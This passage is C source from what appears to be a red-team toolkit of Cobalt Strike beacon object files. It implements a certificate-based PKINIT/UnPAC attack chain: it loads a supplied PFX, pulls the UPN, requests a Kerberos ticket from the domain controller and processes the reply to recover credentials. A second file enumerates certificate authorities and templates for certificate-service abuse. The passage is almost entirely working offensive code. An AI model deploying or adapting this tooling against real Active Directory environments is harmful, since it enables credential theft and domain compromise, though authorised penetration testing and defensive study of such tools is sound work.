if (!CryptStringToBinaryA(base64Pfx, base64Len, CRYPT_STRING_BASE64_ANY, NULL, &pfxLen, NULL, NULL)) {
BeaconPrintf(CALLBACK_OUTPUT, "[!] Failed to get base64 decode size: 0x%08X", GetLastError());
return NULL;
}
pfxData = (BYTE*)malloc(pfxLen);
if (!pfxData) {
BeaconPrintf(CALLBACK_OUTPUT, "[!] Failed to allocate memory for PFX");
return NULL;
}
/* Decode base64 */
if (!CryptStringToBinaryA(base64Pfx, base64Len, CRYPT_STRING_BASE64_ANY, pfxData, &pfxLen, NULL, NULL)) {
BeaconPrintf(CALLBACK_OUTPUT, "[!] Failed to decode base64: 0x%08X", GetLastError());
free(pfxData);
return NULL;
}
/* Import PFX */
CRYPT_DATA_BLOB pfxBlob;
pfxBlob.pbData = pfxData;
pfxBlob.cbData = pfxLen;
hStore = PFXImportCertStore(&pfxBlob, wPassword, CRYPT_EXPORTABLE | PKCS12_ALLOW_OVERWRITE_KEY);
free(pfxData);
if (!hStore) {
BeaconPrintf(CALLBACK_OUTPUT, "[!] Failed to import PFX: 0x%08X", GetLastError());
return NULL;
}
/* Get first certificate with private key */
pCert = CertEnumCertificatesInStore(hStore, NULL);
if (!pCert) {
BeaconPrintf(CALLBACK_OUTPUT, "[!] No certificates in PFX");
CertCloseStore(hStore, 0);
return NULL;
}
/* Note: We're not closing the store yet as the cert context needs it */
return pCert;
}
/* Load certificate from raw PFX bytes */
static PCCERT_CONTEXT LoadCertificateFromBytes(const BYTE* pfxBytes, int pfxLen, const char* password) {
HCERTSTORE hStore = NULL;
PCCERT_CONTEXT pCert = NULL;
WCHAR wPassword[256] = {0};
if (!pfxBytes || pfxLen == 0) {
BeaconPrintf(CALLBACK_OUTPUT, "[!] No PFX data provided");
return NULL;
}
if (password && password[0]) {
MultiByteToWideChar(CP_ACP, 0, password, -1, wPassword, 256);
}
CRYPT_DATA_BLOB pfxBlob;
pfxBlob.pbData = (BYTE*)pfxBytes;
pfxBlob.cbData = pfxLen;
hStore = PFXImportCertStore(&pfxBlob, wPassword, CRYPT_EXPORTABLE | PKCS12_ALLOW_OVERWRITE_KEY);
if (!hStore) {
BeaconPrintf(CALLBACK_OUTPUT, "[!] Failed to import PFX: 0x%08X", GetLastError());
return NULL;
}
pCert = CertEnumCertificatesInStore(hStore, NULL);
if (!pCert) {
BeaconPrintf(CALLBACK_OUTPUT, "[!] No certificates in PFX");
CertCloseStore(hStore, 0);
return NULL;
}
return pCert;
}
/*
* =============================================================================
* Get KDC Address
* =============================================================================
*/
static void GetKdcForDomain(const char* domain, char* kdcHost, int kdcHostLen) {
WCHAR wDomain[256];
PDOMAIN_CONTROLLER_INFOW dcInfo = NULL;
MultiByteToWideChar(CP_ACP, 0, domain, -1, wDomain, 256);
if (DsGetDcNameW(NULL, wDomain, NULL, NULL, DS_IS_DNS_NAME | DS_RETURN_DNS_NAME, &dcInfo) == ERROR_SUCCESS) {
WideCharToMultiByte(CP_ACP, 0, dcInfo->DomainControllerName + 2, -1, kdcHost, kdcHostLen, NULL, NULL);
NetApiBufferFree(dcInfo);
} else {
/* Fallback to domain name */
strcpy(kdcHost, domain);
}
}
/*
* =============================================================================
* Main Attack Chain
* =============================================================================
*/
int my_strcmp(const char *s1, const char *s2)
{
while (*s1 && (*s1 == *s2)) {
s1++;
s2++;
}
return *(unsigned char*)s1 - *(unsigned char*)s2;
}
void PkinitUnPAC(BYTE* pfxBytes, int pfxLen, char* pfxBase64, char* password, char* domain, char* kdcHost, int noUnpac) {
PCCERT_CONTEXT pCert = NULL;
char user[256] = {0};
char domainBuf[256] = {0};
char kdcBuf[256] = {0};
if (domain && domain[0])
strcpy(domainBuf, domain);
if (!domainBuf[0]) {
WCHAR wszDomain[256] = {0};
DWORD dwSize = 256;
/* ComputerNameDnsDomain = 2 */
if (GetComputerNameExW(2, wszDomain, &dwSize) && wszDomain[0]) {
WideCharToMultiByte(CP_UTF8, 0, wszDomain, -1, domainBuf, sizeof(domainBuf), NULL, NULL);
BeaconPrintf(CALLBACK_OUTPUT, "[*] Auto-detected domain: %s", domainBuf);
} else {
BeaconPrintf(CALLBACK_OUTPUT, "[!] Domain not specified and auto-detection failed");
return;
}
}
/* ===== PHASE 1: Load Certificate ===== */
if (pfxBytes && pfxLen > 0) {
pCert = LoadCertificateFromBytes(pfxBytes, pfxLen, password);
} else if (pfxBase64 && pfxBase64[0]) {
pCert = LoadCertificateFromBase64(pfxBase64, password);
}
if (!pCert) {
BeaconPrintf(CALLBACK_OUTPUT, "[!] Failed to load certificate");
return;
}
/* Extract user from certificate SAN (UPN) if not provided */
if (!user[0]) {
PCERT_EXTENSION pExt = NULL;
int i;
for (i = 0; i < (int)pCert->pCertInfo->cExtension; i++) {
if (my_strcmp(pCert->pCertInfo->rgExtension[i].pszObjId, szOID_SUBJECT_ALT_NAME2) == 0) {
pExt = &pCert->pCertInfo->rgExtension[i];
break;
}
}
if (pExt) {
CERT_ALT_NAME_INFO* pAltName = NULL;
DWORD dwSize = 0;
if (CryptDecodeObjectEx(X509_ASN_ENCODING, szOID_SUBJECT_ALT_NAME2,
pExt->Value.pbData, pExt->Value.cbData,
CRYPT_DECODE_ALLOC_FLAG, NULL, &pAltName, &dwSize) && pAltName) {
DWORD j;
for (j = 0; j < pAltName->cAltEntry; j++) {
if (pAltName->rgAltEntry[j].dwAltNameChoice == CERT_ALT_NAME_OTHER_NAME) {
if (my_strcmp(pAltName->rgAltEntry[j].pOtherName->pszObjId, szOID_NT_PRINCIPAL_NAME) == 0) {
/* Decode the UPN */
LPWSTR wszUPN = NULL;
DWORD dwUPNSize = 0;
if (CryptDecodeObjectEx(X509_ASN_ENCODING, X509_UNICODE_ANY_STRING,
pAltName->rgAltEntry[j].pOtherName->Value.pbData,
pAltName->rgAltEntry[j].pOtherName->Value.cbData,
CRYPT_DECODE_ALLOC_FLAG, NULL, &wszUPN, &dwUPNSize) && wszUPN) {
CERT_NAME_VALUE* pNameValue = (CERT_NAME_VALUE*)wszUPN;
if (pNameValue->Value.pbData) {
char szUPN[256] = {0};
WideCharToMultiByte(CP_UTF8, 0, (LPCWSTR)pNameValue->Value.pbData, -1, szUPN, 256, NULL, NULL);
char* pAt = strchr(szUPN, '@');
if (pAt) {
int userLen = (int)(pAt - szUPN);
memcpy(user, szUPN, userLen);
user[userLen] = '\0';
if (!domainBuf[0]) {
strcpy(domainBuf, pAt + 1);
}
BeaconPrintf(CALLBACK_OUTPUT, "[*] Extracted UPN from cert: %s", szUPN);
}
}
LocalFree(wszUPN);
}
break;
}
}
}
LocalFree(pAltName);
}
}
if (!user[0]) {
BeaconPrintf(CALLBACK_OUTPUT, "[!] Could not extract UPN from certificate");
CertFreeCertificateContext(pCert);
return;
}
}
/* ===== PHASE 2: Get KDC ===== */
if (kdcHost && kdcHost[0]) {
strcpy(kdcBuf, kdcHost);
} else {
GetKdcForDomain(domainBuf, kdcBuf, sizeof(kdcBuf));
}
/* ===== PHASE 3: PKINIT Authentication ===== */
/* Build PKINIT AS-REQ */
int asReqLen;
BYTE* asReq = BuildPkinitAsReq(pCert, user, domainBuf, &asReqLen);
if (asReq) {
/* Send to KDC */
int asRepLen;
BYTE* asRep = SendToKdc(kdcBuf, 88, asReq, asReqLen, &asRepLen);
if (asRep) {
/* ===== PHASE 4: Process AS-REP ===== */
/* Convert domain to uppercase for realm */
char realm[256] = {0};
int ri;
for (ri = 0; domainBuf[ri] && ri < 255; ri++) {
realm[ri] = (domainBuf[ri] >= 'a' && domainBuf[ri] <= 'z')
? domainBuf[ri] - 'a' + 'A' : domainBuf[ri];
}
ProcessAsRep(asRep, asRepLen, pCert, user, realm, kdcBuf, noUnpac);
free(asRep);
}
free(asReq);
}
/* Cleanup */
if (pCert) CertFreeCertificateContext(pCert);
}
/* LDAP constants */
#ifndef LDAP_PORT
#define LDAP_PORT 389
#endif
#ifndef LDAP_SCOPE_SUBTREE
#define LDAP_SCOPE_SUBTREE 0x02
#endif
#ifndef LDAP_AUTH_NEGOTIATE
#define LDAP_AUTH_NEGOTIATE 0x0486
#endif
#ifndef LDAP_OPT_REFERRALS
#define LDAP_OPT_REFERRALS 0x08
#endif
#ifndef LDAP_SUCCESS
#define LDAP_SUCCESS 0x00
#endif
/*
* BOF Entry Point for Certificate Authentication
* Arguments: PFX (base64), Password, DC (optional)
*/
void go(char* args, int alen) {
datap parser;
char* szPfxB64 = NULL;
char* szPassword = NULL;
char* szDC = NULL;
BYTE* pbPfx = NULL;
int cbPfx = 0;
short noUnpac = 0;
BeaconDataParse(&parser, args, alen);
szPfxB64 = BeaconDataExtract(&parser, NULL);
szPassword = BeaconDataExtract(&parser, NULL);
szDC = BeaconDataExtract(&parser, NULL);
pbPfx = (BYTE*)BeaconDataExtract(&parser, &cbPfx);
noUnpac = BeaconDataShort(&parser);
if (pbPfx && cbPfx > 0) {
/* PFX passed as raw bytes */
PkinitUnPAC(pbPfx, cbPfx, NULL, szPassword ? szPassword : "", NULL, szDC, noUnpac);
} else if (szPfxB64 && szPfxB64[0]) {
/* PFX passed as base64 */
PkinitUnPAC(NULL, 0, szPfxB64, szPassword ? szPassword : "", NULL, szDC, noUnpac);
} else {
BeaconPrintf(CALLBACK_OUTPUT, "[!] Usage: certi auth --cert <PFX_Base64> [--password <pass>] [--dc <dc>] [--no-unpac]");
BeaconPrintf(CALLBACK_OUTPUT, "[!] or: certi auth --pfx <file> [--password <pass>] [--dc <dc>] [--no-unpac]");
return;
}
}
================================================
FILE: AD-BOF/ADCS-BOF/src/enum/adcs_enum_com2.c
================================================
#include <windows.h>
#include <stdio.h>
#include <oleauto.h>
#include <wchar.h>
#include <io.h>
#include <fcntl.h>
#include <stdint.h>
#include <stdlib.h>
#include <combaseapi.h>
#include <sddl.h>
#include <iads.h>
#include "beacon.h"
#include "bofdefs.h"
#include "adcs_enum_com2.h"
typedef HRESULT WINAPI (*CAEnumFirstCA_t)(IN LPCWSTR wszScope, IN DWORD dwFlags, OUT LPVOID * phCAInfo);
typedef HRESULT WINAPI (*CAEnumNextCA_t)(IN LPVOID hPrevCA, OUT LPVOID * phCAInfo);
typedef HRESULT WINAPI (*CACloseCA_t)(IN LPVOID hCA);
typedef DWORD WINAPI (*CACountCAs_t)(IN LPVOID hCAInfo);
typedef LPCWSTR WINAPI (*CAGetDN_t)(IN LPVOID hCAInfo);
typedef HRESULT WINAPI (*CAGetCAProperty_t)(IN LPVOID hCAInfo, IN LPCWSTR wszPropertyName, OUT PZPWSTR *pawszPropertyValue);
typedef HRESULT WINAPI (*CAFreeCAProperty_t)(IN LPVOID hCAInfo, IN PZPWSTR awszPropertyValue);
typedef HRESULT WINAPI (*CAGetCAFlags_t)(IN LPVOID hCAInfo, OUT DWORD *pdwFlags);
typedef HRESULT WINAPI (*CAGetCACertificate_t)(IN LPVOID hCAInfo, OUT PCCERT_CONTEXT *ppCert);
typedef HRESULT WINAPI (*CAGetCAExpiration_t)(IN LPVOID hCAInfo, OUT DWORD * pdwExpiration, OUT DWORD * pdwUnits);
typedef HRESULT WINAPI (*CAGetCASecurity_t)(IN LPVOID hCAInfo, OUT PSECURITY_DESCRIPTOR * ppSD);
typedef HRESULT WINAPI (*CAGetAccessRights_t)(IN LPVOID hCAInfo, IN DWORD dwContext, OUT DWORD *pdwAccessRights);
typedef HRESULT WINAPI (*CAEnumCertTypesForCA_t)(IN LPVOID hCAInfo, IN DWORD dwFlags, OUT LPVOID * phCertType);
typedef HRESULT WINAPI (*CAEnumCertTypes_t)(IN DWORD dwFlags, OUT LPVOID * phCertType);
typedef HRESULT WINAPI (*CAEnumNextCertType_t)(IN LPVOID hPrevCertType, OUT LPVOID * phCertType);
typedef DWORD WINAPI (*CACountCertTypes_t)(IN LPVOID hCertType);
typedef HRESULT WINAPI (*CACloseCertType_t)(IN LPVOID hCertType);
typedef HRESULT WINAPI (*CAGetCertTypeProperty_t)(IN LPVOID hCertType, IN LPCWSTR wszPropertyName, OUT PZPWSTR *pawszPropertyValue);
typedef HRESULT WINAPI (*CAGetCertTypePropertyEx_t)(IN LPVOID hCertType, IN LPCWSTR wszPropertyName, OUT LPVOID *pPropertyValue);
typedef HRESULT WINAPI (*CAFreeCertTypeProperty_t)(IN LPVOID hCertType, IN PZPWSTR awszPropertyValue);
typedef HRESULT WINAPI (*CAGetCertTypeExtensionsEx_t)(IN LPVOID hCertType, IN DWORD dwFlags, IN LPVOID pParam, OUT PCERT_EXTENSIONS * ppCertExtensions);
typedef HRESULT WINAPI (*CAFreeCertTypeExtensions_t)(IN LPVOID hCertType, IN PCERT_EXTENSIONS pCertExtensions);
typedef HRESULT WINAPI (*CAGetCertTypeFlagsEx_t)(IN LPVOID hCertType, IN DWORD dwOption, OUT DWORD * pdwFlags);
typedef HRESULT WINAPI (*CAGetCertTypeExpiration_t)(IN LPVOID hCertType, OUT OPTIONAL FILETIME * pftExpiration, OUT OPTIONAL FILETIME * pftOverlap);
typedef HRESULT WINAPI (*CACertTypeGetSecurity_t)(IN LPVOID hCertType, OUT PSECURITY_DESCRIPTOR * ppSD);
typedef HRESULT WINAPI (*caTranslateFileTimePeriodToPeriodUnits_t)(IN FILETIME const *pftGMT, IN BOOL Flags, OUT DWORD *pcPeriodUnits, OUT LPVOID*prgPeriodUnits);
typedef HRESULT WINAPI (*CAGetCertTypeAccessRights_t)(IN LPVOID hCertType, IN DWORD dwContext, OUT DWORD *pdwAccessRights);
#define CERTCLI$CAEnumFirstCA ((CAEnumFirstCA_t)DynamicLoad("CERTCLI","CAEnumFirstCA"))
#define CERTCLI$CAEnumNextCA ((CAEnumNextCA_t)DynamicLoad("CERTCLI","CAEnumNextCA"))
#define CERTCLI$CACloseCA ((CACloseCA_t)DynamicLoad("CERTCLI","CACloseCA"))
#define CERTCLI$CACountCAs ((CACountCAs_t)DynamicLoad("CERTCLI","CACountCAs"))
#define CERTCLI$CAGetDN ((CAGetDN_t)DynamicLoad("CERTCLI","CAGetDN"))
#define CERTCLI$CAGetCAProperty ((CAGetCAProperty_t)DynamicLoad("CERTCLI","CAGetCAProperty"))
#define CERTCLI$CAFreeCAProperty ((CAFreeCAProperty_t)DynamicLoad("CERTCLI","CAFreeCAProperty"))
#define CERTCLI$CAGetCAFlags ((CAGetCAFlags_t)DynamicLoad("CERTCLI","CAGetCAFlags"))
#define CERTCLI$CAGetCACertificate ((CAGetCACertificate_t)DynamicLoad("CERTCLI","CAGetCACertificate"))
#define CERTCLI$CAGetCAExpiration ((CAGetCAExpiration_t)DynamicLoad("CERTCLI","CAGetCAExpiration"))
#define CERTCLI$CAGetCASecurity ((CAGetCASecurity_t)DynamicLoad("CERTCLI","CAGetCASecurity"))
#define CERTCLI$CAGetAccessRights ((CAGetAccessRights_t)DynamicLoad("CERTCLI","CAGetAccessRights"))
#define CERTCLI$CAEnumCertTypesForCA ((CAEnumCertTypesForCA_t)DynamicLoad("CERTCLI","CAEnumCertTypesForCA"))
#define CERTCLI$CAEnumCertTypes ((CAEnumCertTypes_t)DynamicLoad("CERTCLI","CAEnumCertTypes"))
#define CERTCLI$CAEnumNextCertType ((CAEnumNextCertType_t)DynamicLoad("CERTCLI","CAEnumNextCertType"))
#define CERTCLI$CACountCertTypes ((CACountCertTypes_t)DynamicLoad("CERTCLI","CACountCertTypes"))
#define CERTCLI$CACloseCertType ((CACloseCertType_t)DynamicLoad("CERTCLI","CACloseCertType"))
#define CERTCLI$CAGetCertTypeProperty ((CAGetCertTypeProperty_t)DynamicLoad("CERTCLI","CAGetCertTypeProperty"))
#define CERTCLI$CAGetCertTypePropertyEx ((CAGetCertTypePropertyEx_t)DynamicLoad("CERTCLI","CAGetCertTypePropertyEx"))
#define CERTCLI$CAFreeCertTypeProperty ((CAFreeCertTypeProperty_t)DynamicLoad("CERTCLI","CAFreeCertTypeProperty"))
#define CERTCLI$CAGetCertTypeExtensionsEx ((CAGetCertTypeExtensionsEx_t)DynamicLoad("CERTCLI","CAGetCertTypeExtensionsEx"))
#define CERTCLI$CAFreeCertTypeExtensions ((CAFreeCertTypeExtensions_t)DynamicLoad("CERTCLI","CAFreeCertTypeExtensions"))
#define CERTCLI$CAGetCertTypeFlagsEx ((CAGetCertTypeFlagsEx_t)DynamicLoad("CERTCLI","CAGetCertTypeFlagsEx"))
#define CERTCLI$CAGetCertTypeExpiration ((CAGetCertTypeExpiration_t)DynamicLoad("CERTCLI","CAGetCertTypeExpiration"))
#define CERTCLI$CACertTypeGetSecurity ((CACertTypeGetSecurity_t)DynamicLoad("CERTCLI","CACertTypeGetSecurity"))
#define CERTCLI$caTranslateFileTimePeriodToPeriodUnits ((caTranslateFileTimePeriodToPeriodUnits_t)DynamicLoad("CERTCLI","caTranslateFileTimePeriodToPeriodUnits"))
#define CERTCLI$CAGetCertTypeAccessRights ((CAGetCertTypeAccessRights_t)DynamicLoad("CERTCLI","CAGetCertTypeAccessRights"))
typedef PCCERT_CONTEXT WINAPI (*CertCreateCertificateContext_t)(DWORD dwCertEncodingType, const BYTE *pbCertEncoded, DWORD cbCertEncoded);
typedef DWORD WINAPI (*CertGetNameStringW_t)(PCCERT_CONTEXT pCertContext, DWORD dwType, DWORD dwFlags, void *pvTypePara, LPWSTR pszNameString, DWORD cchNameString);
typedef WINBOOL WINAPI (*CertGetCertificateContextProperty_t)(PCCERT_CONTEXT pCertContext, DWORD dwPropId, void *pvData, DWORD *pcbData);
typedef WINBOOL WINAPI (*CertGetCertificateChain_t)(HCERTCHAINENGINE hChainEngine, PCCERT_CONTEXT pCertContext, LPFILETIME pTime, HCERTSTORE hAdditionalStore, PCERT_CHAIN_PARA pChainPara, DWORD dwFlags, LPVOID pvReserved, PCCERT_CHAIN_CONTEXT *ppChainContext);
typedef VOID WINAPI (*CertFreeCertificateChain_t)(PCCERT_CHAIN_CONTEXT pChainContext);
#define CRYPT32$CertCreateCertificateContext ((CertCreateCertificateContext_t)DynamicLoad("CRYPT32","CertCreateCertificateContext"))
#define CRYPT32$CertGetNameStringW ((CertGetNameStringW_t)DynamicLoad("CRYPT32","CertGetNameStringW"))
#define CRYPT32$CertGetCertificateContextProperty ((CertGetCertificateContextProperty_t)DynamicLoad("CRYPT32","CertGetCertificateContextProperty"))
#define CRYPT32$CertGetCertificateChain ((CertGetCertificateChain_t)DynamicLoad("CRYPT32","CertGetCertificateChain"))
#define CRYPT32$CertFreeCertificateChain ((CertFreeCertificateChain_t)DynamicLoad("CRYPT32","CertFreeCertificateChain"))
typedef BSTR WINAPI (*SysAllocString_t)(const OLECHAR *);
typedef UINT WINAPI (*SysStringLen_t)(BSTR);
typedef void WINAPI (*SysFreeString_t)(BSTR);
typedef void WINAPI (*SafeArrayDestroy_t)(SAFEARRAY *psa);
typedef void WINAPI (*VariantInit_t)(VARIANTARG *pvarg);
typedef void WINAPI (*VariantClear_t)(VARIANTARG *pvarg);
#define OLEAUT32$SysAllocString ((SysAllocString_t)DynamicLoad("OLEAUT32","SysAllocString"))
#define OLEAUT32$SysStringLen ((SysStringLen_t)DynamicLoad("OLEAUT32","SysStringLen"))
#define OLEAUT32$SysFreeString ((SysFreeString_t)DynamicLoad("OLEAUT32","SysFreeString"))
#define OLEAUT32$SafeArrayDestroy ((SafeArrayDestroy_t)DynamicLoad("OLEAUT32","SafeArrayDestroy"))
#define OLEAUT32$VariantInit ((VariantInit_t)DynamicLoad("OLEAUT32","VariantInit"))
#define OLEAUT32$VariantClear ((VariantClear_t)DynamicLoad("OLEAUT32","VariantClear"))
typedef HRESULT WINAPI (*CoInitializeEx_t)(LPVOID pvReserved, DWORD dwCoInit);
typedef HRESULT WINAPI (*CoUninitialize_t)(void);
typedef int WINAPI (*StringFromGUID2_t)(REFGUID rguid, LPOLESTR lpsz, int cchMax);
#define OLE32$CoInitializeEx ((CoInitializeEx_t)DynamicLoad("OLE32","CoInitializeEx"))
#define OLE32$CoUninitialize ((CoUninitialize_t)DynamicLoad("OLE32","CoUninitialize"))
#define OLE32$StringFromGUID2 ((StringFromGUID2_t)DynamicLoad("OLE32","StringFromGUID2"))
#define CHECK_RETURN_FALSE( function, return_value, result) \
if (FALSE == return_value) \
{ \
result = KERNEL32$GetLastError(); \
BeaconPrintf(CALLBACK_ERROR, "%s failed: 0x%08lx\n", function, result); \
goto fail; \
}
#define CHECK_RETURN_NULL( function, return_value, result) \
if (NULL == return_value) \
{ \
result = E_INVALIDARG; \
BeaconPrintf(CALLBACK_ERROR, "%s failed\n", function); \
goto fail; \
}
#define CHECK_RETURN_FAIL( function, result ) \
if (FAILED(result)) \
{ \
BeaconPrintf(CALLBACK_ERROR, "%s failed: 0x%08lx\n", function, result); \
goto fail; \
}
#define CHECK_RETURN_SOFT_FAIL( function, result ) \
if (FAILED(result)) \
{ \
BeaconPrintf(CALLBACK_ERROR, "%s failed: 0x%08lx\n", function, result); \
}
#define SAFE_DESTROY( arraypointer ) \
if ( (arraypointer) != NULL ) \
{ \
OLEAUT32$SafeArrayDestroy(arraypointer); \
(arraypointer) = NULL; \
}
#define SAFE_RELEASE( interfacepointer ) \
if ( (interfacepointer) != NULL ) \
{ \
(interfacepointer)->lpVtbl->Release(interfacepointer); \
(interfacepointer) = NULL; \
}
#define SAFE_FREE( string_ptr ) \
if ( (string_ptr) != NULL ) \
{ \
OLEAUT32$SysFreeString(string_ptr); \
(string_ptr) = NULL; \
}
#define SAFE_LOCAL_FREE( local_ptr ) \
if (local_ptr) \
{ \
KERNEL32$LocalFree(local_ptr); \
local_ptr = NULL; \
}
#define SAFE_INT_FREE( int_ptr ) \
if (int_ptr) \
{ \
intFree(int_ptr); \
int_ptr = NULL; \
}
#define SAFE_CERTFREECERTIFICATECHAIN( cert_chain_context ) \
if(cert_chain_context) \
{ \
CRYPT32$CertFreeCertificateChain(cert_chain_context); \
cert_chain_context = NULL; \
}
#define DEFINE_MY_GUID(name,l,w1,w2,b1,b2,b3,b4,b5,b6,b7,b8) const GUID name = { l, w1, w2, { b1, b2, b3, b4, b5, b6, b7, b8 } }
DEFINE_MY_GUID(CertificateEnrollment,0x0e10c968,0x78fb,0x11d2,0x90,0xd4,0x00,0xc0,0x4f,0x79,0xdc,0x55);
DEFINE_MY_GUID(CertificateAutoEnrollment,0xa05b8cc2,0x17bc,0x4802,0xa7,0x10,0xe7,0xc1,0x5a,0xb8,0x66,0xa2);
DEFINE_MY_GUID(CertificateAll,0x00000000,0x0000,0x0000,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00);
DEFINE_MY_GUID(ManageCA,0x05000000,0x0015,0x0000,0xf9,0xbf,0xaa,0x22,0x07,0x95,0x8d,0xdd);
HRESULT adcs_enum_com2()
{
HRESULT hr = S_OK;
hr = OLE32$CoInitializeEx( NULL, COINIT_APARTMENTTHREADED );
CHECK_RETURN_FAIL("CoInitializeEx", hr);
hr = _adcs_get_PolicyServerListManager();
CHECK_RETURN_FAIL("_adcs_get_PolicyServerListManager", hr);
hr = S_OK;
//internal_printf("\n adcs_enum_com2 SUCCESS.\n");
fail:
OLE32$CoUninitialize();
return hr;
} // end adcs_enum_com2
HRESULT _adcs_get_PolicyServerListManager()
{
HRESULT hr = S_OK;
IX509PolicyServerListManager * pPolicyServerListManager = NULL;
LONG lPolicyServerUrlCount = 0;
IX509PolicyServerUrl * pPolicyServerUrl = NULL;
CLSID CLSID_IX509PolicyServerListManager = { 0x91f39029, 0x217f, 0x11DA, {0XB2, 0XA4, 0x00, 0x0E, 0x7B, 0xBB, 0x2B, 0x09} };
IID IID_IX509PolicyServerListManager = { 0x884e204b, 0x217d, 0x11da, {0XB2, 0XA4, 0x00, 0x0E, 0x7B, 0xBB, 0x2B, 0x09} };
SAFE_RELEASE(pPolicyServerListManager);
hr = OLE32$CoCreateInstance(&CLSID_IX509PolicyServerListManager, 0, CLSCTX_INPROC_SERVER, &IID_IX509PolicyServerListManager, (LPVOID *)&(pPolicyServerListManager));
CHECK_RETURN_FAIL("CoCreateInstance(CLSID_IX509PolicyServerListManager)", hr);
hr = pPolicyServerListManager->lpVtbl->Initialize(pPolicyServerListManager, ContextUser, PsfLocationGroupPolicy | PsfLocationRegistry);
CHECK_RETURN_FAIL("pPolicyServerListManager->lpVtbl->Initialize()", hr);
hr = pPolicyServerListManager->lpVtbl->get_Count(pPolicyServerListManager, &lPolicyServerUrlCount);
CHECK_RETURN_FAIL("pPolicyServerListManager->lpVtbl->get_Count()", hr);
internal_printf("\n[*] Found %ld policy servers\n", lPolicyServerUrlCount);
for(LONG lPolicyServerIndex=0; lPolicyServerIndex<lPolicyServerUrlCount; lPolicyServerIndex++)
{
SAFE_RELEASE(pPolicyServerUrl);
hr = pPolicyServerListManager->lpVtbl->get_ItemByIndex(pPolicyServerListManager, lPolicyServerIndex, &pPolicyServerUrl);
CHECK_RETURN_FAIL("pPolicyServerListManager->lpVtbl->get_ItemByIndex()", hr);
hr = _adcs_get_PolicyServerUrl(pPolicyServerUrl);
CHECK_RETURN_SOFT_FAIL("[SOFT FAIL] _adcs_get_PolicyServerUrl()", hr);
if (FAILED(hr)){
internal_printf(" Failed to display information for the Policy Server \n");
}
} // end for loop through IX509PolicyServerUrl
hr = S_OK;
//internal_printf("\n _adcs_get_PolicyServerListManager SUCCESS.\n");
fail:
SAFE_RELEASE(pPolicyServerUrl);
SAFE_RELEASE(pPolicyServerListManager);
return hr;
} // end _adcs_get_PolicyServerListManager
HRESULT _adcs_get_PolicyServerUrl(IX509PolicyServerUrl * pPolicyServerUrl)
{
HRESULT hr = S_OK;
BSTR bstrPolicyServerUrl = NULL;
BSTR bstrPolicyServerFriendlyName = NULL;
BSTR bstrPolicyServerId = NULL;
hr = pPolicyServerUrl->lpVtbl->get_Url(pPolicyServerUrl, &bstrPolicyServerUrl);
CHECK_RETURN_FAIL("pPolicyServerUrl->lpVtbl->get_Url()", hr);
hr = pPolicyServerUrl->lpVtbl->GetStringProperty(pPolicyServerUrl, PsPolicyID, &bstrPolicyServerId);
CHECK_RETURN_FAIL("pPolicyServerUrl->lpVtbl->GetStringProperty(PsPolicyID)", hr);
hr = pPolicyServerUrl->lpVtbl->GetStringProperty(pPolicyServerUrl, PsFriendlyName, &bstrPolicyServerFriendlyName);
CHECK_RETURN_FAIL("pPolicyServerUrl->lpVtbl->GetStringProperty(PsFriendlyName)", hr);
internal_printf("\n[*] Enumerating enrollment policy servers for %S...\n", bstrPolicyServerFriendlyName);
hr = _adcs_get_EnrollmentPolicyServer(bstrPolicyServerUrl, bstrPolicyServerId);
CHECK_RETURN_FAIL("_adcs_get_EnrollmentPolicyServer()", hr);
hr = S_OK;
//internal_printf("\n _adcs_get_PolicyServerUrl SUCCESS.\n");
fail:
SAFE_FREE(bstrPolicyServerUrl);
SAFE_FREE(bstrPolicyServerFriendlyName);
SAFE_FREE(bstrPolicyServerId);
return hr;
} // end _adcs_get_PolicyServerUrl
HRESULT _adcs_get_EnrollmentPolicyServer(BSTR bstrPolicyServerUrl, BSTR bstrPolicyServerId)
{
HRESULT hr = S_OK;
IX509EnrollmentPolicyServer * pEnrollmentPolicyServer = NULL;
ICertificationAuthorities * pCAs = NULL;
LONG lCAsCount = 0;
ICertificationAuthority * pCertificateAuthority = NULL;
IX509CertificateTemplates * pCertificateTemplates = NULL;
LONG lCertificateTemplatesCount = 0;
IX509CertificateTemplate * pCertificateTemplate = NULL;
CLSID CLSID_CX509EnrollmentPolicyActiveDirectory = { 0x91f39027, 0x217f, 0x11DA, {0XB2, 0XA4, 0x00, 0x0E, 0x7B, 0xBB, 0x2B, 0x09} };
IID IID_IX509EnrollmentPolicyServer = { 0x13b79026, 0x2181, 0x11da, {0XB2, 0XA4, 0x00, 0x0E, 0x7B, 0xBB, 0x2B, 0x09} };
SAFE_RELEASE(pEnrollmentPolicyServer);
hr = OLE32$CoCreateInstance( &CLSID_CX509EnrollmentPolicyActiveDirectory, 0, CLSCTX_INPROC_SERVER, &IID_IX509EnrollmentPolicyServer, (LPVOID *)&(pEnrollmentPolicyServer));
CHECK_RETURN_FAIL("CoCreateInstance()", hr);
hr = pEnrollmentPolicyServer->lpVtbl->Initialize(pEnrollmentPolicyServer, bstrPolicyServerUrl, bstrPolicyServerId, X509AuthKerberos, TRUE, ContextUser);
CHECK_RETURN_FAIL("pEnrollmentPolicyServer->lpVtbl->Initialize()", hr);
hr = pEnrollmentPolicyServer->lpVtbl->LoadPolicy(pEnrollmentPolicyServer, LoadOptionReload);
CHECK_RETURN_FAIL("pEnrollmentPolicyServer->lpVtbl->LoadPolicy()", hr);
SAFE_RELEASE(pCAs);
hr = pEnrollmentPolicyServer->lpVtbl->GetCAs(pEnrollmentPolicyServer, &pCAs);
CHECK_RETURN_FAIL("pEnrollmentPolicyServer->lpVtbl->GetCAs()", hr);
hr = pCAs->lpVtbl->get_Count(pCAs, &lCAsCount);
CHECK_RETURN_FAIL("pCAs->lpVtbl->get_Count()", hr);
internal_printf("\n[*] Found %ld CAs\n", lCAsCount);
for(LONG lCAsIndex=0; lCAsIndex<lCAsCount; lCAsIndex++)
{
SAFE_RELEASE(pCertificateAuthority);
hr = pCAs->lpVtbl->get_ItemByIndex(pCAs, lCAsIndex, &pCertificateAuthority);
CHECK_RETURN_FAIL("pCAs->lpVtbl->get_ItemByIndex()", hr);
hr = _adcs_get_CertificationAuthority(pCertificateAuthority);
CHECK_RETURN_SOFT_FAIL("[SOFT FAIL] _adcs_get_CertificationAuthority()", hr);
if (FAILED(hr)){
internal_printf(" Failed to display information for the CertificationAuthority \n");
}
} // end for loop through ICertificationAuthority
SAFE_RELEASE(pCertificateTemplates);
hr = pEnrollmentPolicyServer->lpVtbl->GetTemplates(pEnrollmentPolicyServer, &pCertificateTemplates);
